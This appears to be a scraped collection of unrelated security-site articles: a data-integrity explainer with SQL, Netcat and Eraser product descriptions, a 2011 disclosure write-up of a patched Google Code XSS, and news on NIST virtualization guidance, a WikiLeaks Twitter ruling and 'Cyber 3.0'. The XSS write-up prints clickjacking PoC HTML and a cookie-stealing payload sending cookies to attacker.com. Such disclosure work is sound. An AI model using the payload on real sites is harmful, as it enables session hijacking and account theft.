Data integrity

Data integrity refers to data that has a complete, whole structure. All characteristics of the data, including business rules, rules for how pieces of data relate, dates, definitions and lineage, must be correct for the data to be complete.

Within the discipline of data architecture, any function performed on the data must preserve its integrity. Examples of such functions are transforming the data, storing its history, storing its definitions (metadata) and storing its lineage as it moves from one place to another. The most important aspect of data integrity, from the data architecture perspective, is to expose the data, the functions and the data’s characteristics.

Data that has integrity is maintained identically during any operation (such as transfer, storage or retrieval). Put simply, in business terms, data integrity is the assurance that data is consistent, certified and can be reconciled.

In terms of a database, data integrity refers to the process of ensuring that a database remains an accurate reflection of the universe of discourse it is modelling or representing; in other words, that there is a close correspondence between the facts stored in the database and the real world it models.

Types of integrity constraints

Data integrity is normally enforced in a database system by a series of integrity constraints or rules. Three types of integrity constraints are an inherent part of the relational data model: entity integrity, referential integrity and domain integrity.

Entity integrity concerns the concept of a primary key. The entity integrity rule states that every table must have a primary key and that the column or columns chosen as the primary key must be unique and not null.
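
For example, in standard SQL the primary key is declared when the table is created (a minimal sketch; the table and column names are illustrative):

-- Entity integrity: every row is uniquely identifiable.
-- A PRIMARY KEY column must be unique and is implicitly NOT NULL.
CREATE TABLE department (
    dept_id INTEGER PRIMARY KEY,
    name    VARCHAR(100) NOT NULL
);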

Referential integrity concerns the concept of a foreign key. The referential integrity rule states that any foreign key value can only be in one of two states. The usual state of affairs is that the foreign key value refers to a primary key value of some table in the database. Occasionally, and this will depend on the rules of the business, a foreign key value can be null. In this case we are explicitly saying that either there is no relationship between the objects represented in the database or that this relationship is unknown.
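
Extending the sketch above, a foreign key declaration lets the database enforce this rule; leaving dept_id nullable captures the “unknown or no relationship” case (again, the names are illustrative):

-- Referential integrity: dept_id must match an existing department
-- row, or be NULL when the relationship is absent or unknown.
CREATE TABLE employee (
    employee_id INTEGER PRIMARY KEY,
    name        VARCHAR(100) NOT NULL,
    dept_id     INTEGER REFERENCES department (dept_id)
);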

Domain integrity specifies that every column in a relational database must be declared on a defined domain. The primary unit of data in the relational data model is the data item; such data items are said to be non-decomposable or atomic. A domain is a set of values of the same type. Domains are therefore pools of values from which the actual values appearing in a table’s columns are drawn.
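
Standard SQL expresses this with CREATE DOMAIN (supported by PostgreSQL, for example; systems without it typically attach CHECK constraints to the column directly). A minimal sketch with illustrative names:

-- Domain integrity: column values are drawn from a defined pool.
CREATE DOMAIN percentage AS INTEGER
    CHECK (VALUE BETWEEN 0 AND 100);

CREATE TABLE exam_result (
    student_id INTEGER PRIMARY KEY,
    score      percentage NOT NULL
);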

If a database supports these features, it is the responsibility of the database to ensure data integrity as well as the consistency model for data storage and retrieval. If a database does not support these features, it is the responsibility of the applications to ensure data integrity, while the database supports the consistency model for data storage and retrieval.

Having a single, well-controlled and well-defined data integrity system increases stability (one centralized system performs all data integrity operations), performance (all data integrity operations are performed in the same tier as the consistency model), re-usability (all applications benefit from a single centralized data integrity system) and maintainability (one centralized system for all data integrity administration).

Today, since all modern databases support these features (see Comparison of relational database management systems), it has become the de facto responsibility of the database to ensure data integrity. Outdated and legacy systems that use file systems (text files, spreadsheets, ISAM, flat files, etc.) for their consistency model lack any kind of data integrity model. This forces companies to invest a large amount of time, money and personnel in building data integrity systems on a per-application basis that effectively just duplicate the data integrity systems found in modern databases. Many companies, and indeed many database vendors, offer products and services to migrate outdated and legacy systems to modern databases that provide these data integrity features. This offers companies substantial savings in time, money and resources because they do not have to develop per-application data integrity systems that must be re-factored each time business requirements change.

The GNU Netcat

What is Netcat?

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

It provides access to the following main features:
Outbound and inbound connections, TCP or UDP, to or from any ports.
Featured tunneling mode which also allows special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel).
Built-in port-scanning capabilities, with randomizer.
Advanced usage options, such as buffered send-mode (one line every N seconds), and hexdump (to stderr or to a specified file) of transmitted and received data.
Optional RFC854 telnet codes parser and responder.
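
A few illustrative invocations follow; they assume the nc 1.10-compatible option set that GNU Netcat targets, and the host names are placeholders:

# Connect to a remote web server on TCP port 80
nc -v www.example.com 80

# Listen for an inbound TCP connection on local port 1234
nc -l -p 1234

# Scan TCP ports 20-80 in random order, reporting the open ones
nc -v -z -r target.example.com 20-80

# Send one line every 5 seconds, hexdumping traffic to a file
nc -i 5 -o dump.txt www.example.com 80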

The GNU Netcat is distributed freely under the GNU General Public License (GPL).

Project Goals

Although the project development is marked as beta, GNU Netcat is already stable enough for everyday use.
The goals of this project are full compatibility with the original nc 1.10, which is widely used, and portability. GNU Netcat should compile and work without changes on the following hosts:
Linux (test host: alphaev67-unknown-linux-gnu)

FreeBSD (test host: i386-unknown-freebsd4.9)

NetBSD (test host: i386-unknown-netbsdelf1.6.1)

SunOS/Solaris (test host: sparc-sun-solaris2.9)

MacOS X (test host: powerpc-apple-darwin6.8)

Other operating systems could be supported with minor source modifications, since the code has been written following the GNU coding standard conventions.
If you find a bug or want to report a successful build on another OS, use the bug tracking system.

Soon the project will split releases into “stable” and “development” lines to improve development speed and allow the introduction of new features without requiring too much testing.

For further information, see the README and ChangeLog files in the package.
If you are courageous enough to try the newest development version or you want to contribute patches, you may want to check out the version in the CVS repository.

Eraser

Eraser is an advanced security tool for Windows which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Eraser is currently supported under Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7 and Windows Server 2008 R2. Eraser is Free software and its source code is released under the GNU General Public License.

Why Use Eraser?

Most people have some data that they would rather not share with others: passwords, personal information, classified documents from work, financial records, self-written poems; the list continues. Perhaps you have saved some of this information on your computer where it is conveniently within your reach, but when the time comes to remove the data from your hard disk, things get a bit more complicated, and maintaining your privacy is not as simple as it may have seemed at first.

Your first thought may be that when you ‘delete’ the file, the data is gone. Not quite. When you delete a file, the operating system does not really remove the file from the disk; it only removes the reference to the file from the file system table. The file remains on the disk until another file is created over it, and even after that, it might be possible to recover the data by studying the magnetic fields on the disk platter surface. Before the file is overwritten, anyone can easily retrieve it with a disk maintenance or undelete utility.

There are several problems in secure file removal, mostly caused by the use of write caches, the construction of the hard disk and the use of data encoding. These problems were taken into consideration when Eraser was designed, and because of this intuitive design and a simple user interface, you can safely and easily erase private data from your hard drive.

Eraser Features

• It works with Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7 and Windows Server 2008 R2
  ◦ Windows 98, ME, NT and 2000 can still be used with version 5.7!
• It works with any drive that works with Windows
• Secure drive erasure methods are supported out of the box
• Erases files, folders and their previously deleted counterparts
• Works with an extremely customisable Scheduler
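
As the “Why Use Eraser?” section explains, truly removing a file means overwriting its contents before the space is reused; Eraser automates this on Windows. As a rough illustration of the same overwrite-before-delete idea on Unix-like systems (this uses GNU coreutils’ shred, not Eraser’s own code):

# Overwrite secret.txt three times with patterns, add a final
# pass of zeros to hide the shredding, then truncate and delete it
shred -v -n 3 -z -u secret.txt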

Exploitation of “Self-Only” Cross-Site Scripting in Google Code

April 11, 2011

As an attempt to contribute to Google’s Rewarding Web Application Security Research, I started working on Google Code in search of vulnerabilities that could qualify for the reward program. That is where I came across a Cross-Site Scripting bug which seemed “not exploitable” at first. As Google has patched the vulnerable pages, I’m going to explain the exploitation of this bug here.

“Self-Only” Cross-Site Scripting

The term “Self-Only” XSS has been used in the past by many researchers for “CSRF-protected XSS”. You can read about it here and here. The issue I found on the Google Code site was not related to CSRF-protected XSS; I call this bug “Self-Only” XSS because of its nature: it was not a GET or POST XSS and could only be triggered by the victim himself. This means the victim has to type “<script>alert(document.cookie)</script>” into the input box and click “Go!” to get his own cookies. Confused? OK, I’ll try to explain this with the Google Code example.

Cross-Site Scripting in Google Code

Google Code hosts the documentation for Google APIs. The Google Map API documentation includes example pages that demonstrate different map functions. One of them is the “Simple Geocoding” example. The link for this page is:

This page displays the geo-location of the requested location on the map. The page makes a GET request to the Google Map API and displays the result.

When requested with a valid location followed by an XSS payload, e.g. pune<script>alert(document.cookie)</script>, the page makes the following GET request to the Google Map API:

The Google Map API returns a JSON response to the request, as below:

This response is rendered by the example page at Google Code as below:

And executes the payload in the victim’s browser:

This is due to a lack of sanitization of the malicious data while rendering the output back to the example page.

A quick analysis of the request/response reveals that this XSS cannot be exploited by the classical GET or POST method. As an attacker, we cannot control any request that could be used to craft a payload which, when sent to the victim, executes in his/her browser. For a successful attack, the victim has to type the XSS payload himself/herself into the vulnerable input box and click the “Go!” button. That is what I refer to as “Self-Only” XSS.

Exploitation

During a discussion with Lavakumar, he suggested checking for a possible clickjacking attack using the HTML5 Drag and Drop exploit.

The target page was vulnerable to clickjacking, and after spending a few hours I was able to craft a working PoC for this attack. Here are the scenario and details:

An attacker hosts a Drag and Drop game which convinces the victim to perform Drag and Drop operations. The game page renders the vulnerable Google Code page in an invisible iframe. It also has an element like this:

<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil data')"><h3>DRAG ME!!</h3></div>

When the victim starts dragging this, the event’s data value is set to ‘Evil data’. The victim then drops the element onto a text field inside the invisible iframe, which populates it with the ‘Evil data’. Finally, the victim clicks a dummy button which is placed over the “Go!” button from the vulnerable page.
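
Put together, the attack page might look roughly like the following sketch (this is not the original PoC; VULNERABLE_PAGE_URL is a placeholder for the Google Code example page, and the iframe geometry has to be tuned so the hidden input box and “Go!” button line up with the decoy elements):

<html>
<body>
<!-- Decoy element the victim is asked to drag -->
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil data')"><h3>DRAG ME!!</h3></div>

<!-- Vulnerable page rendered invisibly over the game; the drop target
     (the input box) and the "Go!" button sit under the decoy elements -->
<iframe src="VULNERABLE_PAGE_URL" style="opacity:0; position:absolute; top:0; left:0; width:800px; height:600px;"></iframe>
</body>
</html>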

This is how the PoC looks:

The victim drags the text to the input field, which then holds the XSS payload.

Then he/she clicks on the “Go!” button.

Bingo!!

The Attack – Cookie Stealing

By changing the ‘Evil data’ in the Drag and Drop element to point to the attacker’s cookie-grabbing script, a successful cookie-stealing attack can be performed.

<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '<script>document.location=\'http://attacker.com/google/grab.php?cookie=\'+document.cookie</script>')"><h3>DRAG ME!!</h3></div>

NIST Issues Final Version of Full Virtualization Security Guidelines

March 13, 2011

The National Institute of Standards and Technology (NIST) has issued the final version of its recommendations for securely configuring and using full computing virtualization technologies. The security recommendations are contained in the Guide to Security for Full Virtualization Technologies (NIST Special Publication (SP) 800-125). The draft report was issued for public comment in July 2010.

Virtualization adds a low-level software layer that allows multiple, even different operating systems and applications to run simultaneously on a host. “Full virtualization” provides a complete simulation of underlying computer hardware, enabling software to run without any modification. Because it helps maximize the use and flexibility of computing resources—multiple operating systems can run simultaneously on the same hardware—full virtualization is considered a key technology for cloud computing, but it introduces new issues for IT security.

For cloud computing systems in particular, full virtualization can increase operational efficiency because it can optimize computer workloads and adjust the number of servers in use to match demand, thereby conserving energy and information technology resources. The guide describes security concerns associated with full virtualization technologies for server and desktop virtualization and provides recommendations for addressing these concerns. Most existing recommended security practices also apply in virtual environments and the practices described in this document build on and assume the implementation of practices described in other NIST computer security publications.

The guide is intended for system administrators, security program managers, security engineers and anyone else involved in designing, deploying or maintaining full virtualization technologies. NIST SP 800-125 recommends organizations:

  • secure all elements of a full virtualization solution and maintain their security;
  • restrict and protect administrator access to the virtualization solution;
  • ensure that the hypervisor, the central program that runs the virtual environment, is properly secured; and
  • carefully plan the security for a full virtualization solution before installing, configuring and deploying it.

NIST SP 800-125, Guide to Security for Full Virtualization Technologies, may be downloaded from http://csrc.nist.gov/publications/nistpubs/800-125/SP800-125-final.pdf.

Judge Won’t Stop WikiLeaks Twitter-Records Request

March 13, 2011

The U.S. government is getting closer to getting data from Twitter about various associates of WikiLeaks.

The people whose Twitter records were being requested had moved to throw out the government’s request for data, but a judge denied that motion Friday, ruling that the associates don’t have standing to challenge it.

The judge also denied a request to unseal the government’s application for the Twitter order.

Judge Theresa Buchanan, in the Eastern District of Virginia, ruled that because the government was not seeking the content of the Twitter accounts in question, the subjects did not have standing to challenge the government’s request for the records. Content, under the Stored Communications Act, is “any information concerning the substance, purport, or meaning of that communication.”

The government is looking for data about the Twitter users’ accounts and how they are used, not the content of tweets or direct messages. It’s the Twitter equivalent of a list of incoming and outgoing phone numbers.

“The Twitter Order does not demand the contents of any communication,” Judge Buchanan wrote in her opinion, “and thus constitutes only a request for records under [the law].”

The Justice Department served Twitter last December with an order seeking information on several people associated with the secret-spilling site WikiLeaks: Birgitta Jonsdottir, a member of Iceland’s parliament; Julian Assange, founder of WikiLeaks; Bradley Manning, suspected of leaking classified information to WikiLeaks; WikiLeaks’ U.S. representative Jacob Appelbaum; and Dutch businessman and activist Rop Gonggrijp. Jonsdottir and Gonggrijp helped WikiLeaks prepare a classified U.S. Army video that the site published last April.

While the application for the Twitter order is still sealed, the court unsealed the order itself, at Twitter’s request. According to the order, the government seeks full contact details for the accounts (including phone numbers and addresses), IP addresses used to access the accounts, connection records (“records of session times and durations”) and data-transfer information, such as the size of data file sent to someone else and the destination IP.

Since Twitter is used for sending 140-character updates, not data files, the wording of the request suggests that it’s likely a boilerplate form that could also have been submitted to ISPs, e-mail providers and social networking sites like Facebook.

The Justice Department’s demand for the records is part of a grand jury investigation that appears to be probing WikiLeaks for its high-profile leaks of classified U.S. material. It is seeking the records under 18 USC 2703(d), a provision of the 1994 Stored Communications Act that governs law enforcement access to non-content internet records, such as transaction information.

More powerful than a subpoena, but not as strong as a search warrant, a 2703(d) order is supposed to be issued when prosecutors provide a judge with “specific and articulable facts” that show the information they seek is relevant and material to a criminal investigation. But the people targeted in the records demand don’t have to themselves be suspected of criminal wrongdoing.

After Twitter notified Jonsdottir in January that the government had sought information about her account, the EFF and the ACLU filed a motion challenging the government’s attempt to obtain the records, asking the court to vacate the order. In their motion, the two groups said the government’s demand for the records violated First Amendment speech rights and Fourth Amendment privacy rights of the Twitter-account holders, among other things.

The groups also filed motions to unseal records in the case, hoping to gain information about the government’s grounds for seeking the records, as well as any information that might indicate if the government had sought similar records from Facebook, ISPs or other service providers.

A hearing to discuss the motion to vacate the Twitter order was held in mid-February.

In her ruling Friday, Buchanan discussed whether the government provided sufficient justification in its application to obtain the records. She acknowledged that the complainants were facing an uphill battle in arguing against the legitimacy of the government’s request, because the government’s application is still sealed and therefore unavailable to them. Nonetheless, she concluded that the government’s application stated “specific and articulable” facts that were sufficient for issuing the Twitter order:

The disclosures sought are “relevant and material” to a legitimate law enforcement inquiry. Also, the scope of the Twitter Order is appropriate even if it compels disclosure of some unhelpful information. Indeed, §2703(d) is routinely used to compel disclosure of records, only some of which are later determined to be essential to the government’s case. Thus, the Twitter Order was properly issued pursuant to §2703(d).

Buchanan further ruled that the request did not violate the account holder’s First Amendment rights, because the order did not seek to control their speech or their associations. Nor did it violate the Fourth Amendment, because the account holders did not have a reasonable expectation of privacy over subscriber information they freely provided to Twitter.

“Similarly, the Fourth Amendment permits the government to warrantlessly install a pen register to record numbers dialed from a telephone, because a person voluntarily conveys the numbers without a legitimate expectation of privacy,” Judge Buchanan wrote.

Attorneys with the EFF and ACLU told Threat Level they plan to appeal the decision.

“Case law from the Supreme Court makes it clear that individuals have a right to challenge government requests for information about them,” said ACLU attorney Aden Fine. “This decision permits the government to obtain court orders requiring the disclosure of private information in secret. That’s not how our system works.”

He also disputed Judge Buchanan’s assertion that users have no expectation of privacy over data they willingly give Twitter and other third parties.

“She’s essentially saying there are no constitutional interests at stake here, because this is all public information,” he said. “But just because a third party has some information, does not mean you have no Fourth Amendment right in that information. Everything that’s at issue here is private information. Most people reasonably believe that that information will be kept private. That’s why in our view the court got it wrong.”

Twitter said in a statement that its policy is “designed to allow users to defend their own rights. As such, Twitter will continue to let the judicial process run its course.”

Photo: Birgitta Jonsdottir, a member of Iceland’s parliament. (Friðrik Tryggvason/Wikimedia Commons)


 

US Deputy Defense Secretary Reveals ‘Cyber 3.0’ Details

March 13, 2011

Addressing what he called “the most technically sophisticated audience,” US Deputy Secretary of Defense William Lynn III took the RSA Conference stage on Tuesday to discuss the Armed Forces’ role in defending a new domain: cyberspace.

“Information technology is at the core of our most important military capabilities,” Lynn told the crowd of thousands of security experts.  “It gives us the ability to navigate with accuracy, to communicate with certainty, to see the battlefield with clarity, and to strike with precision. But for all the wonderful capabilities technology enables in our military, it also introduces enormous vulnerabilities.”

Referencing one major incident in particular, Lynn said the 2008 breach of US military networks via a foreign intelligence agency’s corrupted thumb drive changed how the Defense Department approaches cybersecurity.

“It was our worst fear: a rogue program operating silently on our system, poised to deliver operation plans into the hands of an enemy,” said the deputy secretary. “Unfortunately the cyber threat continues to mature, posing dangers to our security that far exceed the 2008 breach of our classified systems.”

Noting the recent cyber intrusions in the oil and gas industry, as well as NASDAQ and Google attacks, Lynn pointed out that cyber threats are occurring on both government and commercial systems, thereby stressing the need for the public and private sectors to work together to protect the nation.

While Lynn classified most cyber attacks against the US government and industry as exploits that are “relatively unsophisticated in nature,” he went on to stress, “In the future, more capable adversaries could potentially immobilize networks on a wider scale, for much longer periods of time.”

In particular, Lynn focused on the threat that terrorists could pose if given the resources and capabilities to launch an attack.

“Al-Qaeda, which has vowed to unleash cyber attacks, has not yet done so, but it is possible for a terrorist group to develop cyber attack tools on their own, or even to buy them on the black market,” Lynn suggested.

To develop a proactive cyber defense, the deputy secretary revealed five pillars to be laid out in a forthcoming Defense Department comprehensive cyber strategy being called ‘Cyber 3.0.’

“First, the Defense Department has formally recognized cyberspace as a new domain of warfare, like air, land, sea and space,” Lynn said, noting that the first pillar of Cyber 3.0 would entail the military defending all US networks, as they do for physical US territories.

Additional pillars of Cyber 3.0 include: equipping US networks with active defenses, rather than post-attack cleanup; ensuring that the critical infrastructure the military relies on is protected; building collective defenses with US allies; and positioning the nation’s technological and human resources to ensure that the country retains its preeminent capabilities in cyberspace.

“Throughout American history, at moments of great challenge and crisis, industry and the private sector have stood up, partnered with government and developed the capabilities to keep our country safe,” Lynn noted.  “The incredible technologies that have resulted – including the Internet itself – have made our military the most effective fighting force in the world and our economy the most advanced of any nation.”

 
